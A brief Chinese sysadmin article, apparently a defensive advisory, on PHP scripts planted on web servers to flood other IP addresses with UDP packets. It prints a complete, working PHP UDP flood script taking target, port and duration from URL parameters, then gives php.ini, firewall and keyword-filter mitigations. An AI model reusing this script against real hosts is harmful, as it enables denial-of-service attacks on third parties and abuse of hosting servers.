黑客用PHP代码调用sockets,直接用服务器的网络攻击别的IP,常见代码如下:
代码如下:
01.$packets=0;
02.$ip=$_GET[\'ip\'];
03.$rand=$_GET[\'port\'];
04.set_time_limit(0);
05.ignore_user_abort(FALSE);
06.$exec_time=$_GET[\'time\'];
07.$time=time();
08.print\"Floodediponport$rand
09.\";
10.$max_time=$time+$exec_time;
11.for($i=0;$i<65535;$i++){
12.$out.=\"X\";
13.}
14.while(1){
15.$packets++;
16.if(time()>$max_time){
17.break;
18.}
19.$fp=fsockopen(\"udp://$ip\",$rand,$errno,$errstr,5);
20.if($fp){
21.fwrite($fp,$out);
22.fclose($fp);
23.}
24.}
25.echo\"acketcompleteat\".time(\'h:i:s\').\"with$packets(\".round(($packets*65)/1024,2).\"mB)packetsaveraging\".round($packets/$exec_time,2).\"packets/s\\n\";
26.?>
表现特征:
一打开IIS,服务器的流出带宽就用光-----就是说服务器不断向别人发包,这个情况和受到DDOS攻击是不同的,DDOS是不断收到大量数据包.
解决办法:
禁止上述的代码:
在c:\windows\php.ini里设置:
disable_functions=gzinflate;
在c:\windows\php.ini里设其值为Off
allow_url_fopen=Off
并且:
;extension=php_sockets.dll
前面的;号一定要有,意思就是限制用sockets.dll
前面的;号要保留
然后重启IIS
如果上述方式仍然无效,你可以在IIS中,允许的扩展中,禁止PHP的扩展测试.
另外,对于没加密的php攻击代码,还可以用以下办法处理:
1.在IP策略,或防火墙中,禁止所有udp向外发送
2.用一流信息监控,在SQL拦截及网址拦截中,拦截port=这个关键词 |
|